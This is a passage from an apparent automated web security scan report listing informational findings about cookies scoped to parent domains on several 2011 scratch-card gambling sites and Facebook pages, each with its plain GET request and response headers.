Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:28 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 55152


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.93. http://www.bigmoneyscratch.com/Promotions.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /Promotions.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Promotions.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:04:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:03 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:03 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:03 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:03 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:03 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49441


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.94. http://www.bigmoneyscratch.com/Responsible.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /Responsible.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Responsible.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:07:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:11 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:11 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:11 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:11 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:11 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52839


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.95. http://www.bigmoneyscratch.com/SecurityAndPrivacy.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /SecurityAndPrivacy.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /SecurityAndPrivacy.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:07:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:08 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:08 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:08 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:08 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:08 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46612


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.96. http://www.bigmoneyscratch.com/Terms.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /Terms.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Terms.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:07:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:04 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:04 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:04 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:04 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:04 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 109507


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.97. http://www.bigmoneyscratch.com/UnderAge.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /UnderAge.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /UnderAge.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:07:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:36 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:36 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:36 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:36 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:36 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45844


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.98. http://www.facebook.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=OxnRTfED2OUFMXxmZkOCiFGO; expires=Wed, 15-May-2013 12:31:55 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=szS-2; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.116.65
Connection: close
Date: Mon, 16 May 2011 12:31:55 GMT
Content-Length: 29704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

11.99. http://www.facebook.com/PrimeScratchCards

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /PrimeScratchCards

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PrimeScratchCards HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=PRnRTabFyBz2fUR8tW4oYCwo; expires=Wed, 15-May-2013 12:31:57 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=ci4lk; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.27.42
Connection: close
Date: Mon, 16 May 2011 12:31:57 GMT
Content-Length: 35761

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

11.100. http://www.facebook.com/WinningsCom

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /WinningsCom

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /WinningsCom?id=tb HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=OhnRTeSZjl5Fn1flFpG8JJU9; expires=Wed, 15-May-2013 12:31:54 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=V8GN3; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.102.57
Connection: close
Date: Mon, 16 May 2011 12:31:55 GMT
Content-Length: 41751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

11.101. http://www.facebook.com/crazyscratch

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crazyscratch

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /crazyscratch HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=OxnRTUnjv0Wq3vp7H5Lg8kQU; expires=Wed, 15-May-2013 12:31:55 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=HCAHZ; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fcrazyscratch; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcrazyscratch; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.134.58
Connection: close
Date: Mon, 16 May 2011 12:31:55 GMT
Content-Length: 40706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

11.102. http://www.facebook.com/pages/BigMoneyScratch/156518521055171

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/BigMoneyScratch/156518521055171

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pages/BigMoneyScratch/156518521055171 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Location: http://www.facebook.com/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: datr=OxnRTQnBh8OpqRjSzWcXKlvK; expires=Wed, 15-May-2013 12:31:55 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=7uzqb; path=/; domain=.facebook.com
Set-Cookie: next=http%3A%2F%2Fwww.facebook.com%2Fpages%2FBigMoneyScratch%2F156518521055171; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=%2Fpages%2FBigMoneyScratch%2F156518521055171; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.38.33
Connection: close
Date: Mon, 16 May 2011 12:31:55 GMT
Content-Length: 0


11.103. http://www.facebook.com/pages/PrimeScratchCards/122783514413813

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/PrimeScratchCards/122783514413813

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pages/PrimeScratchCards/122783514413813 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Location: http://www.facebook.com/PrimeScratchCards
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: datr=PBnRTVS0-zB1xKJnbwFkgEiW; expires=Wed, 15-May-2013 12:31:56 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=DEbk9; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.90.55
Connection: close
Date: Mon, 16 May 2011 12:31:56 GMT
Content-Length: 0


11.104. http://www.facebook.com/peoplespostcodelottery

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /peoplespostcodelottery

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /peoplespostcodelottery HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=PBnRTUnMC-QzxdCoW9pJpTTF; expires=Wed, 15-May-2013 12:31:56 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=1P6PH; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.53.64
Connection: close
Date: Mon, 16 May 2011 12:31:56 GMT
Content-Length: 36902

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

11.105. http://www.hopa.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hopa.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.hopa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=B7E205F9FF290BAED7305BD74C2DA067; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_4=EncryptedUniqueVisitorID=B7E205F9FF290BAED7305BD74C2DA067&AffiliateID=4&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=4; ASP.NET_SessionId=e01kb5453bgwt555nikmx12o;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:10:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=hopa.com; expires=Fri, 16-May-2014 12:10:19 GMT; path=/
Set-Cookie: BO=FM; domain=hopa.com; expires=Fri, 16-May-2014 12:10:19 GMT; path=/
Set-Cookie: UniqueVisitorID=B7E205F9FF290BAED7305BD74C2DA067; domain=hopa.com; expires=Fri, 16-May-2014 12:10:19 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=hopa.com; expires=Fri, 16-May-2014 12:10:19 GMT; path=/
Set-Cookie: CountryCode=US; domain=hopa.com; expires=Fri, 16-May-2014 12:10:19 GMT; path=/
Set-Cookie: CSITemp=4; domain=hopa.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44701


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.106. http://www.hopa.com/visit.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hopa.com
Path:   /visit.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /visit.aspx?csi=10&CorID=&SentDate=&CorExpTime=& HTTP/1.1
Host: www.hopa.com
Proxy-Connection: keep-alive
Referer: http://scratch.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 16 May 2011 11:41:38 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: ASP.NET_SessionId=nfixaxv3hvxxgxi1a4r3yqyy; path=/; HttpOnly
Set-Cookie: CSI_4=EncryptedUniqueVisitorID=EEACA8F7E2BB877FE832932388F7EA58&AffiliateID=4&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=hopa.com; expires=Fri, 16-May-2031 11:41:38 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=hopa.com; expires=Fri, 16-May-2014 11:41:38 GMT; path=/
Set-Cookie: BO=FM; domain=hopa.com; expires=Fri, 16-May-2014 11:41:38 GMT; path=/
Set-Cookie: UniqueVisitorID=EEACA8F7E2BB877FE832932388F7EA58; domain=hopa.com; expires=Fri, 16-May-2014 11:41:38 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=hopa.com; expires=Fri, 16-May-2014 11:41:38 GMT; path=/
Set-Cookie: CountryCode=US; domain=hopa.com; expires=Fri, 16-May-2014 11:41:38 GMT; path=/
Set-Cookie: CSITemp=4; domain=hopa.com; path=/
Vary: Accept-Encoding
Content-Length: 131


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



11.107. http://www.info.crazyscratch.com/AboutUs.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /AboutUs.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AboutUs.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:46:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:39 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:39 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:39 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:39 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:39 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 57114


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.108. http://www.info.crazyscratch.com/ContactUsFax.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /ContactUsFax.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsFax.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
